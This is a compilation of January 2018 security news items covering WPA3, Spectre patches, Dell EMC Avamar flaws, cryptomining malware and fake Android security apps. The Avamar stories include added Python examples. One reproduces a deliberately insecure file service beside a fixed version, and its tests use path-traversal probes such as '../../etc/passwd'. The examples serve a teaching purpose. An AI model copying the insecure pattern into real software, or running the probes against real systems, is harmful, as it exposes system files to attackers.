The Wi-Fi Alliance -- comprising 15 major sponsor members (including Apple, Cisco, Dell, Intel, Microsoft, Qualcomm and more) and hundreds of contributing members -- has announced that WPA3 will be introduced during 2018.

WPA3 is not an immediate replacement for WPA2, which will continue to be maintained and enhanced. In particular, the Alliance will introduce new testing enhancements for WPA2 to reduce the potential for vulnerabilities caused by network misconfigurations; and will further safeguard managed networks with centralized authentication services.

New Wi-Fi Alliance WPA3 certified devices will take some time to filter into widespread use. Use of the new specification will require WPA3 devices and WPA3 routers -- and since the vast majority of home wi-fi users never buy a router but use the one supplied by their ISP, many users won't become WPA3 compatible before they change ISPs. That could take several years.

Nevertheless, there are some welcome enhancements over the WPA2 specification that has kept users largely, but not entirely, protected for around two decades.

Four new capabilities for both personal and enterprise networks have been announced. There are no technical details in the Wi-Fi announcement, leading to some conjecture over exactly how they will be introduced.

The first will be to provide "robust protections" even when the user fails to use a strong password. Mathy Vanhoef, the researcher who discovered the KRACK WPA2 vulnerability, has suggested on Twitter, "That means dictionary attacks no longer work. The handshake they're referring to is likely Simultaneous Authentication of Equals (SAE). Which is also called Dragonfly;" adding, "The standards behind WPA3 already existed for a while. But now devices are *required* to support them, otherwise they won't receive the "WPA3-certified" label."

The second will simplify the process of configuring security on wi-fi devices that have limited or no display interface. The obvious use will be for small personal devices, like wearables such as smart watches -- but it could also play some role in improving the future security of the industrial internet of things.

The third will improve the security of open wi-fi hotspots -- such as cafes, hotels and airport lounges -- by giving each user individualized data encryption. On this, Vanhoef commented, "This might refer to Opportunistic Wireless Encryption: encryption without authentication." It won't make the use of wi-fi hotspots completely secure, but should go some way to reassuring security officers who know that corporate employees work from hotspots while traveling.

The fourth will be a 192-bit security suite aligned with the Commercial National Security Algorithm (CNSA) Suite, that will further protect wi-fi networks with higher security requirements; such as government, defense, and industrial.

We can expect that new WPA3 devices will start to appear over the next few months -- particularly since many of the manufacturers will be members of the Alliance. However, the devices will need to wait for the launch of the Wi-Fi Alliance's formal certification process before they can be truly called such. The Wi-Fi Certified designation will be important to reassure buyers.

"Security is a foundation of Wi-Fi Alliance certification programs, and we are excited to introduce new features to the Wi-Fi CERTIFIED family of security solutions," commented Edgar Figueroa, president and CEO of Wi-Fi Alliance. "The Wi-Fi CERTIFIED designation means Wi-Fi devices meet the highest standards for interoperability and security protections."


Microsoft Suspends CPU Flaw Patches for AMD Devices
9.1.2018 securityweek
Vulnerability
Microsoft Will Not Deliver Security Updates to Devices With Incompatible Antiviruses

Users whose computers have AMD processors no longer receive the recent Windows updates designed to patch the Meltdown and Spectre vulnerabilities, and Microsoft has warned that some systems may not receive upcoming security updates if the antivirus running on them has not set a specific registry key.

Several individuals whose devices are powered by some AMD processors, particularly older models, complained that they had been unable to boot Windows 10 after installing KB4056892, an update released by Microsoft in response to flaws affecting Intel, AMD and ARM processors.

Many of those affected said their operating system froze during boot. Those who managed to restore their systems by reverting to a previous state needed to quickly disable automatic updates to prevent the patch from being reinstalled.

Some of the impacted users pointed out that since the risk of attacks against AMD CPUs is said to be low, they can wait for proper updates from Microsoft.

Microsoft has confirmed the issue, explaining that “some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.”

The tech giant has decided to temporarily pause Windows updates to devices with impacted AMD processors. For those who have already installed the updates and are experiencing problems, Microsoft has provided some recommendations on how to fix the issue.

Microsoft’s advice for Windows 10 users includes starting the computer in safe mode and uninstalling recent updates, or restoring the system to an earlier point. Several users have complained, however, that they get an error when attempting to restore the system.

In addition to causing problems for Windows, the Spectre and Meltdown updates from Microsoft also break some applications, including the PulseSecure VPN and an Asus utility.

Security updates will not be delivered to devices with incompatible antiviruses

When Microsoft first released the updates designed to prevent Spectre and Meltdown attacks, the company warned that it had identified compatibility issues with some security products. It informed users that if they had not been offered the security updates, it may have been due to the failure of their antivirus to create a specific registry key.

Microsoft later also informed users that they may not receive any future security updates if their antivirus vendor does not address the problem.

Researcher Kevin Beaumont has been keeping track of which security vendors have implemented this requirement. As of Monday, a majority of firms had either released automatic fixes or made available instructions on how to manually create the required registry key. The remaining vendors are working on fixes.

Microsoft noted that users who don’t rely on any antivirus will also need to manually create the registry key.

The role of the registry key is to prevent blue screen of death (BSOD) errors triggered due to compatibility issues when security products make unsupported calls to the Windows kernel memory. Microsoft says the requirement for the registry key will remain in place until the company is confident that a majority of consumers will not experience crashes due to the security updates.


Adobe Patch Tuesday Updates Fix Only One Flash Player Flaw
9.1.2018 securityweek
Vulnerability
Adobe’s Patch Tuesday updates for January 2018 resolve only an information disclosure vulnerability affecting Flash Player.

The flaw, tracked as CVE-2018-4871, has been classified as “important” and assigned a priority rating of 2, which means it is unlikely to be exploited in malicious attacks any time soon.

The security hole has been described as an out-of-bounds read issue that can lead to information exposure. It affects Flash Player 28.0.0.126 and earlier on Windows, Mac, Linux and Chrome OS, and it has been patched with the release of version 28.0.0.137. The patch will also be included in the next Chrome release and Microsoft’s Patch Tuesday updates.

Adobe says it has learned about the vulnerability from an anonymous researcher via Trend Micro’s Zero Day Initiative (ZDI).

The number of vulnerabilities discovered by researchers in Flash Player has dropped significantly in recent months, after Adobe announced its intention to kill the application by 2020.

However, malicious actors are still finding and exploiting zero-day vulnerabilities in Flash. In October, shortly after Adobe announced that it had no Patch Tuesday updates, the company was forced to quickly release a fix for Flash Player after learning that a cyber espionage group from the Middle East had been leveraging a zero-day to deliver spyware.

The same vulnerability was later exploited by the Russia-linked group APT28 (also known as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team) in attacks aimed at government organizations and aerospace companies. Fortunately, this was apparently the only Flash Player zero-day exploited in 2017.


VirusTotal Launches Visualization Tool
9.1.2018 securityweek Security
VirusTotal this week announced the availability of a visualization tool designed to help with malware investigations.

Dubbed VirusTotal Graph, the new tool is available at https://www.virustotal.com/graph/ or through a public report in the tool section (which requires a VirusTotal login).

The tool should make it easier for investigators who are working with multiple reports at the same time, attempting to pivot between multiple data points (files, URLs, domains and IP addresses), as such work would normally result in having multiple tabs opened, which could complicate operations.

“VirusTotal receives a large number of files and URLs every day, and each of them is analyzed by AVs and other tools and sandboxes to extract information about them. This information is critical for our ecosystem, as it connects the dots and makes clear the connections between entities,” VirusTotal notes.

Built on top of VirusTotal’s data set, the new tool was designed to “understand the relationship between files, URLs, domains and IP addresses” and to bring the necessary information on these five entity types (relationships are included) together on a single interface, thus making it easier to navigate.

Some of the features available for users include a search box (it even supports multiple indicators of compromise, via a Multi-entity search section), node summary section (summarizes the more relevant information), node expansion section (to correlate information from more than one entity), node action menu, detection dropdown (shows the number of AV detections), and node list (shows the list of all nodes in the panel).

The key elements of the VirusTotal Graph user interface will provide investigators not only with the most relevant information at a glance when clicking on a node, but also with the option to explore and expand each of the nodes in their graph, and build a network and observe connections across samples. Zooming in or out on a graph is also possible.

VirusTotal also allows users to save the graphs so they can access them at any time, as well as to share their findings with other users (generating permalinks to the graph is also possible). VirusTotal makes all saved graphs public and also linked in VirusTotal public reports of files, URLs, IP addresses or domains that appear in the graph.

Furthermore, with the help of VirusTotal public or VirusTotal Intelligence reports, users will be able to add labels and access in-depth reports.

“We feel the community will benefit from this intelligence. We understand that there are scenarios where a higher degree of privacy is needed, and we are working on a solution -- expect to see some news around it soon,” VirusTotal concludes.

Additional information on the new tool is available on VirusTotal’s support page and in two YouTube videos providing tutorials on Files and Domains.


Wi-Fi Alliance launches WPA2 enhancements and announced WPA3
9.1.2018 securityaffairs Safety

The Wi-Fi Alliance introduced several key improvements to the Wi-Fi Protected Access II (WPA2) security protocol and announced its successor, WPA3. Wi-Fi security will be dramatically improved with the introduction of the WPA3 protocol.
The arrival of the WPA3 protocol was announced on Monday by the Wi-Fi Alliance; it is the successor of the WPA2 protocol for securing Wi-Fi communications.

WPA3 will build on the core components of WPA2; in the meantime, the alliance plans to roll out three enhancements for WPA2 in the first part of the year.

“Wi-Fi Alliance is launching configuration, authentication, and encryption enhancements across its portfolio to ensure Wi-Fi CERTIFIED devices continue to implement state of the art security protections.” reads the announcement published by the Wi-Fi Alliance.

“Four new capabilities for personal and enterprise Wi-Fi networks will emerge in 2018 as part of Wi-Fi CERTIFIED WPA3”

WPA2 is known to be vulnerable to KRACK attacks and deauthentication (DEAUTH) attacks. The three key enhancements to the WPA2 protocol will address authentication, encryption, and configuration issues.

The Wi-Fi Alliance, which includes tech giants like Apple, Cisco, Intel, Qualcomm, and Microsoft, announced WPA3-certified devices for later in 2018. They will include two features that improve protection when users choose weak passwords and simplify the choice of proper security settings on devices with limited or no interface screens.

Another feature will strengthen user privacy in open networks by using individualized data encryption. The last feature is a 192-bit security suite, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems, that will ensure the protection of Wi-Fi networks with higher security requirements such as government and defense.

“Security is a foundation of Wi-Fi Alliance certification programs, and we are excited to introduce new features to the Wi-Fi CERTIFIED family of security solutions,” concluded Edgar Figueroa, president and CEO of Wi-Fi Alliance. “The Wi-Fi CERTIFIED designation means Wi-Fi devices meet the highest standards for interoperability and security protections.”

Further information will be made available once the WPA3 program is launched.


Apple released patches to fix Spectre flaws in Safari, macOS, and iOS
9.1.2018 securityaffairs Apple

Apple released iOS 11.2.2, a macOS High Sierra 10.13.2 supplemental update, and Safari 11.0.2 to fix the Spectre flaws.
On Monday, Apple released patches to fix the Spectre flaws in Safari, macOS, and iOS: the tech giant released iOS 11.2.2 and a macOS High Sierra 10.13.2 supplemental update. The patches also fixed vulnerabilities in Apple WebKit, the web browser engine used by Safari, Mail, and the App Store.

The security updates issued by Apple aim to mitigate the two known methods for exploiting Spectre identified as “bounds check bypass” (CVE-2017-5753/Spectre/v1) and “branch target injection” (CVE-2017-5715/Spectre/v2).

Just after the disclosure of the Meltdown and Spectre attacks, Apple released security updates (iOS 11.2, macOS and tvOS 11.2) to protect its systems against Meltdown attacks.

Apple now released the following security updates:

macOS High Sierra 10.13.2 supplemental;
Safari 11.0.2, available for OS X El Capitan 10.11.6 and macOS Sierra 10.12.6;
iOS 11.2.2 available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation;
After the disclosure of the flaws, security experts pointed out that the Spectre vulnerability is very hard to patch, but fortunately it is much more difficult to exploit than Meltdown.

Another worrisome aspect of the Spectre attacks is that they break the isolation between different applications, opening the door to remote attacks; for example, an attacker can remotely bypass the sandboxing mechanisms implemented by modern browsers.


Apple Adds Spectre Protections to Safari, WebKit
9.1.2018 securityweek
Vulnerability
Updates released by Apple on Monday for iOS, macOS and Safari should mitigate the effects of the vulnerabilities exploited by the recently disclosed attack method named Spectre.

Apple informed customers that iOS 11.2.2 and macOS High Sierra 10.13.2 Supplemental Update include security improvements for Safari and WebKit. The Safari improvements are also included in version 11.0.2 of Apple’s web browser.

The latest updates address the Spectre vulnerabilities, specifically CVE-2017-5753 and CVE-2017-5715. Mitigations for the Meltdown attack were rolled out by Apple, before the flaws were disclosed, with the release of iOS 11.2, macOS 10.13.2 and tvOS 11.2. Apple Watch is not vulnerable to either of the attack methods.

Apple’s analysis showed that the Spectre vulnerabilities “are extremely difficult to exploit,” even by a local app running on iOS or macOS, but the company warned that remote exploitation via JavaScript running in the browser is possible.

“Our current testing indicates that the upcoming Safari mitigations will have no measurable impact on the Speedometer and ARES-6 tests and an impact of less than 2.5% on the JetStream benchmark,” Apple said last week.

Apple believes the Meltdown technique, which relies on a vulnerability tracked as CVE-2017-5754, has the most potential for exploitation.

Meltdown and Spectre can be used by malicious actors to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information.

The attacks work against devices with Intel, AMD and ARM processors. Intel has been hit the hardest, while AMD claims the risk of attacks is low and ARM found that only ten of its CPUs are impacted.

Patches and workarounds have already been released by several major vendors, but they can introduce significant performance penalties, and Microsoft’s updates may also break Windows and various apps.


Dell EMC fixes 3 zero-day vulnerabilities in Data Protection Appliance products
9.1.2018 securityaffairs
Vulnerability

Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by 3 zero-day flaws.
Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by vulnerabilities that can be chained by an attacker to take complete control of a target system.

The flaws reside in the Avamar Installation Manager (AVI) component that is present in all the products.

The vulnerabilities were discovered by experts at the consultancy firm Digital Defense Inc. The three issues are:

An authentication bypass in SecurityService;
An authenticated arbitrary file access in UserInputService;
An authenticated file upload in UserInputService.
Dell published a security advisory, ESA-2018-001, which is accessible to customers with Dell EMC Online Support credentials.

The most severe issue tracked as CVE-2017-15548 could be exploited by a remote attacker to bypass authentication and gain root access to the system.

The flaw is related to the authentication process that is implemented via a POST request including the username, password and a parameter named wsUrl.

“User authentication is performed via a POST that includes username, password and wsURL parameters. The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” reads the analysis published by Digital Defense. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn’t require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second flaw, tracked as CVE-2017-15549, could be exploited by an authenticated attacker with low privileges to upload malicious files to the server.

“Authenticated users can upload arbitrary files to arbitrary locations with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” continues the analysis.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character. The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third vulnerability tracked as CVE-2017-15550 is a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“Authenticated users can download arbitrary files with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” states the analysis.

“The getFileContents method of the UserInputService class doesn’t perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability.”

By chaining the three vulnerabilities a remote attacker could take complete control of a vulnerable system.
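The three weaknesses described above share one root cause: server-side trust in caller-supplied values (the wsUrl target, the path half of the saveFileContents payload, the getFileContents filename). The following is an added example, not Dell EMC's code, showing the input checks a hardened handler would apply; the allowlisted host, the file root directory and the function names are hypothetical stand-ins.

```python
"""Hardened handling of the three AVI-style inputs described above.

Added example, not Dell EMC's code: the host allowlist, the file root and
the function names are hypothetical stand-ins for the real AVI code paths.
"""
import os
from typing import Optional, Tuple
from urllib.parse import urlparse

# Constructed allowlist: the only hosts an authentication SOAP request may be
# sent to. The bypass (CVE-2017-15548) worked because wsUrl could name any host.
TRUSTED_AUTH_HOSTS = {"auth.avamar.internal.example"}

# Constructed directory to which getFileContents/saveFileContents-style paths
# are confined (CVE-2017-15549 / CVE-2017-15550 accepted any path, as root).
FILE_ROOT = "/var/lib/avi/files"


def is_trusted_ws_url(ws_url: str) -> bool:
    """Accept only https URLs whose host is on the allowlist.

    The decision is made on the parsed hostname, so userinfo tricks such as
    'https://trusted@evil/' resolve to the real host and are rejected; anything
    unparseable or non-https is rejected too.
    """
    try:
        parsed = urlparse(ws_url)
    except ValueError:
        return False
    if parsed.scheme != "https":
        return False
    return parsed.hostname is not None and parsed.hostname in TRUSTED_AUTH_HOSTS


def resolve_within_root(user_path: str, root: str = FILE_ROOT) -> Optional[str]:
    """Map a user-supplied relative path to an absolute path under root.

    Returns None for absolute paths, for the root itself, and for anything
    that escapes root once '..' segments and symlinks are resolved.
    """
    if os.path.isabs(user_path) or user_path.startswith(("\\", "/")):
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if not candidate.startswith(root_real + os.sep):
        return None
    return candidate


def parse_save_request(payload: str) -> Optional[Tuple[str, str]]:
    """Split a saveFileContents-style payload ('path\\rdata') and confine the path.

    Returns (absolute_path, data), or None when the payload lacks the '\\r'
    separator or the path would land outside FILE_ROOT.
    """
    if "\r" not in payload:
        return None
    raw_path, data = payload.split("\r", 1)
    safe_path = resolve_within_root(raw_path)
    if safe_path is None:
        return None
    return safe_path, data


if __name__ == "__main__":
    # Constructed inputs mirroring the three reported weaknesses.
    print(is_trusted_ws_url("https://auth.avamar.internal.example/ws"))  # True
    print(is_trusted_ws_url("https://untrusted.example/fake-soap"))      # False
    print(resolve_within_root("../../../etc/shadow"))                    # None
    print(parse_save_request("reports/job1.log\rjob finished"))
```

The same resolve_within_root check serves the getFileContents read path, which the original code left entirely unvalidated.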

Affected products are:

Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4.x, 7.5.0
NetWorker Virtual Edition 0.x, 9.1.x, 9.2.x
Integrated Data Protection Appliance 2.0
EMC has released security fixes that address all the flaws.


Experts spotted Monero cryptominer sending currency to North Korean University
9.1.2018 securityaffairs Hacking

Security researchers at AlienVault labs recently analyzed an application compiled on Christmas Eve 2017 that is an installer for a Monero cryptocurrency miner.
The mined Monero coins are sent to Kim Il Sung University in Pyongyang, North Korea, but experts noted that the developers might not be of North Korean origins.

KSU is an unusually open university; it is attended by a number of foreign students and lecturers.

The researchers speculate the application could be either experimental software or a prank designed to trick security researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Once executed, it copies a file named intelservice.exe to the system; this is the Monero cryptocurrency mining malware.

“The filename intelservice.exe is often associated with crypto-currency mining malware. Based on the arguments it’s executed with, it’s likely a piece of software called xmrig.” reads the analysis published by AlienVault.

“It’s not unusual to see xmrig in malware campaigns. It was recently used in some wide campaigns exploiting unpatched IIS servers to mine Monero.”

The experts determined that it is a piece of software called xmrig by observing the arguments the file is executed with.

Analyzing the file, the researchers discovered both the address of the Monero wallet and the password used, “KJU”, a possible reference to Kim Jong-un.

The mined currency is sent to the server barjuok.ryongnamsan.edu.kp, located at Kim Il Sung University.

The address barjuok.ryongnamsan.edu.kp doesn’t currently resolve, either because the app was designed to run on the university’s network, or because it is no longer in use.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.” continues the analysis.

“On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.”

Security experts pointed out that North Korea-linked group Lazarus was already involved in attacks involving cryptocurrencies.

In December, security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.

Earlier attacks focused on Monero and conducted by North Korean threat actors were attributed to the Bluenorroff and Andariel groups, which are considered part of Lazarus. Researchers from AlienVault highlighted that they haven’t found evidence linking the newly discovered installer to any attacks attributed to Lazarus.

“We have not identified anything linking our Installer to these attacks. The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code.” concluded the research. “Given the amateur usage of Visual Basic programming in the Installer we analysed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project.”

The experts also offered another hypothesis: someone inside the university developed the project to test the use of cryptocurrency in a country hit hard by sanctions.


Trend Micro spotted 36 malicious apps advertised as security tools in Google Play
8.1.2018 securityaffairs Android

Researchers from Trend Micro have discovered 36 malicious apps on Google Play that are posing as security tools of major firms.
Once again crooks have bypassed the security checks implemented by Google: researchers from Trend Micro have discovered 36 malicious apps on Google Play that pose as security tools.

The crooks advertised the apps as security tools from major security firms, under names including Security Defender, Security Keeper, Smart Security and Advanced Boost.

The applications were designed to steal user information and flood victims with ads.

“These apps posed as useful security tools under the names Security Defender, Security Keeper, Smart Security, Advanced Boost, and more. They also advertised a variety of capabilities: scanning, cleaning junk, saving battery, cooling the CPU, locking apps, as well as message security, WiFi security, and so on.” reads the blog post published by Trend Micro.

“The apps were actually able to perform these simple tasks, but they also secretly harvested user data, tracked user location, and aggressively pushed advertisements.”

The apps collect information such as the user’s Android ID, MAC address, IMSI, OS data, brand and model of the device, device specifics, language, location information, and data on installed apps like Google Play and Facebook, and send it to a remote server.

The malicious apps are also capable of uploading installed app information, attachments, user operational information, and data on activated events as well.

When the apps are launched for the first time, they do not appear in the device launcher’s list of applications, and no shortcuts appear on the device screen; in this way, victims only see the notifications sent by the apps. The malicious apps typically push alarmist security warnings and pop-up windows to the victims.

Experts noticed that the apps implement a specific function called “hide” that will not allow the applications to run on specified devices including the Google Nexus 6P, Xiaomi MI 4LTE, ZTE N958St and LGE LG-H525n. Experts believe that the “hide” function was developed to avoid security checks implemented by Google Play.

The apps bombard users with false security notifications and other messages such as advertisements; examples of notifications are “10.0 GB files are being wasted” and “Fraud SMS Broadcast Vulnerability.”


If a user clicks the button displayed on the prompt, the fake security tool shows a simple animation indicating that the problem has been resolved.

“The user is bombarded with ads with almost every action. It is clear that one of the main focuses of the app is ad display and click fraud.” continues the analysis.

“Users are actually asked to sign and agree to a EULA (end-user license agreement) which describes the information that will be gathered and used by the app,” researchers said in the report. “But we can still say that the app abuses privacy because the collection and transmission of personal data is unrelated to the functionality of the app.”

The fake security tools were spotted in December 2017 and promptly removed.


BlackBerry Mobile Website hacked, crooks installed a Coinhive’s code to mine Monero
8.1.2018 securityaffairs Hacking

According to Coinhive, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento e-commerce software.
The spike in the value of some cryptocurrencies like Bitcoin is attracting the interest of cyber criminals. The number of incidents and cyber attacks involving miners and mining scripts continues to increase, and the latest appears to be the BlackBerry Mobile site.

On January 6, a Reddit user who goes by the moniker “Rundvleeskroket” claimed that the official website of BlackBerry Mobile had been caught running Coinhive’s cryptocurrency code to mine Monero. Rundvleeskroket wrote that a friend had pointed out that the BlackBerry Mobile domain (blackberrymobile.com) was using the Coinhive code:

“A friend of mine just pointed this out to me.
Have a look at the source code on their pages. This is an official site where BB links to themselves from their product pages at blackberry.com.

Image.” he wrote.

Originally pointed out by /u/cryptocripples on /r/security

Update: it seems like only their global site is affected. So anyone getting redirected to CA, EU, US, etc won’t have the coinhive miner running while the site is open.”

The Reddit user also shared the following screenshot:


The Coinhive code has been removed from the BlackBerry Mobile site; unfortunately, such incidents are becoming frequent. In many cases, website owners themselves use the Coinhive code to generate Monero by exploiting the computational resources of unaware visitors.

In December, experts from Sucuri discovered that nearly 5,500 WordPress websites were infected with a malicious script that logs keystrokes and loads a cryptocurrency miner in visitors’ browsers.

In November, experts reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

According to a comment from Coinhive on the Reddit post, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento ecommerce software.

Coinhive added that the same account had been used in the hacks of many other websites, and for this reason it was suspended.

“Coinhive here. We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.” commented Coinhive.


Monero Miner Sends Cryptocurrency to North Korean University
8.1.2018 securityweek Hacking
An application compiled just weeks ago was found to be an installer for a Monero miner designed to send the mined currency to a North Korean university, AlienVault reports.

The application’s developers, however, might not be of North Korean origins themselves, the security researchers say. They also suggest that the tool could either be only an experimental application or could attempt to trick researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, a possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu.kp. The use of this domain reveals that the server is located at Kim Il Sung University, AlienVault says.

AlienVault's security researchers also discovered that the specified address doesn’t resolve, either because the app was designed to run on the university’s network, because the address used to resolve in the past, or because it is only meant to trick security researchers.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining,” AlienVault says.

The sample was also found to contain obvious messages printed for debugging as well as fake filenames meant to avoid detection. According to the researchers, if the software author is at the Kim Il Sung University, they might not be North Korean.

“KSU is an unusually open University, and has a number of foreign students and lecturers,” the researchers explain.

North Korean attacks focused on Monero mining have been spotted before, such as those associated with Bluenorroff and Andariel hackers, who are generally considered as being part of the Lazarus group. However, AlienVault hasn’t discovered evidence to link the newly found installer to the previous attacks.

“The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code. Given the amateur usage of Visual Basic programming in the Installer we analyzed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project,” the researchers note.

On the other hand, with the country hit hard by sanctions, crypto-currencies could easily prove highly valuable resources, and a North Korean university’s interest in the area wouldn’t be surprising.

In fact, the Pyongyang University of Science and Technology recently invited foreign experts to lecture on crypto-currencies, and the recently discovered installer might be a product of their endeavors, AlienVault suggests.


Serious Flaws Affect Dell EMC, VMware Data Protection Products
8.1.2018 securityweek Vulnerability
Data protection products from both Dell EMC and VMware are impacted by three potentially serious vulnerabilities discovered by researchers at Digital Defense.

EMC told customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products have a common component, the Avamar Installation Manager (AVI). This component is affected by vulnerabilities that can be combined to take complete control of a system.

The most serious of the flaws, CVE-2017-15548, allows a remote attacker to bypass authentication and gain root access to the system. The vulnerability is related to the fact that authentication is performed via a POST request that includes the username, password and a parameter named wsUrl.

“The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” Digital Defense explained. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn't require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second vulnerability, CVE-2017-15549, allows an authenticated attacker with low privileges to upload malicious files to the server.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character,” researchers said. “The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third security hole, CVE-2017-15550, has been described as a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“The getFileContents method of the UserInputService class doesn't perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability,” researchers said.
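As an added illustration (not Dell EMC's code), the following Python sketch re-creates the file-handling pattern Digital Defense describes for CVE-2017-15549 and CVE-2017-15550 beside a hardened equivalent that confines every path to a base directory. The class and method names mirror the report's UserInputService, but the implementation, the base-directory parameter and the sample inputs are assumptions for this example.

```python
"""Illustrative re-creation of the Avamar file-handling flaws.

Not Dell EMC's code: the classes below are assumptions that mirror the
behaviour Digital Defense describes (CVE-2017-15549 / CVE-2017-15550)
so the defect and its fix can be compared side by side.
"""
import os
import tempfile


class VulnerableUserInputService:
    """Takes user-controlled paths verbatim, as the report describes."""

    def save_file_contents(self, arg: str) -> str:
        # Single parameter split on '\r': path first, file data second.
        path, _, data = arg.partition("\r")
        with open(path, "w", encoding="utf-8") as fh:   # any path, anywhere
            fh.write(data)
        return path

    def get_file_contents(self, filename: str) -> str:
        with open(filename, encoding="utf-8") as fh:    # no validation at all
            return fh.read()


class HardenedUserInputService:
    """Same interface, but every path is resolved and confined to base_dir."""

    def __init__(self, base_dir: str) -> None:
        self.base_dir = os.path.realpath(base_dir)

    def _confine(self, user_path: str) -> str:
        if not user_path or "\0" in user_path:
            raise ValueError("empty or malformed path")
        # join() discards base_dir for absolute input; realpath() collapses
        # '..' and symlinks; commonpath() then proves the result is inside.
        candidate = os.path.realpath(os.path.join(self.base_dir, user_path))
        if os.path.commonpath([self.base_dir, candidate]) != self.base_dir:
            raise PermissionError(f"path escapes base directory: {user_path!r}")
        return candidate

    def save_file_contents(self, arg: str) -> str:
        path, sep, data = arg.partition("\r")
        if not sep:
            raise ValueError("expected '<path>\\r<data>'")
        target = self._confine(path)
        os.makedirs(os.path.dirname(target), exist_ok=True)  # still inside base
        with open(target, "w", encoding="utf-8") as fh:
            fh.write(data)
        return target

    def get_file_contents(self, filename: str) -> str:
        with open(self._confine(filename), encoding="utf-8") as fh:
            return fh.read()


def run_checks() -> dict:
    """Exercise both services on constructed inputs inside temp directories."""
    results = {}
    with tempfile.TemporaryDirectory() as base, tempfile.TemporaryDirectory() as elsewhere:
        base_real = os.path.realpath(base)
        escaped = os.path.join(elsewhere, "escaped.txt")

        # Vulnerable service: an absolute path in the parameter lands outside.
        VulnerableUserInputService().save_file_contents(escaped + "\rwritten")
        results["vulnerable_escaped"] = os.path.exists(escaped)

        # Hardened service: relative writes stay inside, escapes are refused.
        svc = HardenedUserInputService(base)
        written = svc.save_file_contents("notes/a.txt\rhello")
        results["hardened_inside"] = written.startswith(base_real + os.sep)
        results["roundtrip"] = svc.get_file_contents("notes/a.txt")
        for probe in ("../../etc/passwd", "/etc/passwd", "notes/../../x", escaped):
            try:
                svc.get_file_contents(probe)
                results[probe] = "allowed"
            except PermissionError:
                results[probe] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key}: {value}")
```

The confinement check is the part worth copying: resolve the candidate path first, then compare the resolved prefix, rather than pattern-matching for `..` in the raw string. Running the web server as an unprivileged user would additionally limit what an escaped path could reach.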

Combining the flaws allows a remote attacker to take complete control of a vulnerable system.

EMC Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4.x and 7.5.0, EMC NetWorker Virtual Edition (NVE) 9.0.x, 9.1.x and 9.2.x, and EMC Integrated Data Protection Appliance 2.0 are impacted. EMC has released patches for each of the affected products.

Digital Defense told SecurityWeek that there are more than 100 Avamar server instances accessible from the Internet – according to the Shodan search engine – which experts say is unexpected considering that the affected products are backup and deduplication appliances.

While a blog post from Digital Defense and some media reports describe the flaws as “zero-days,” the vendor has released patches prior to disclosure and there is no evidence of exploitation in the wild.

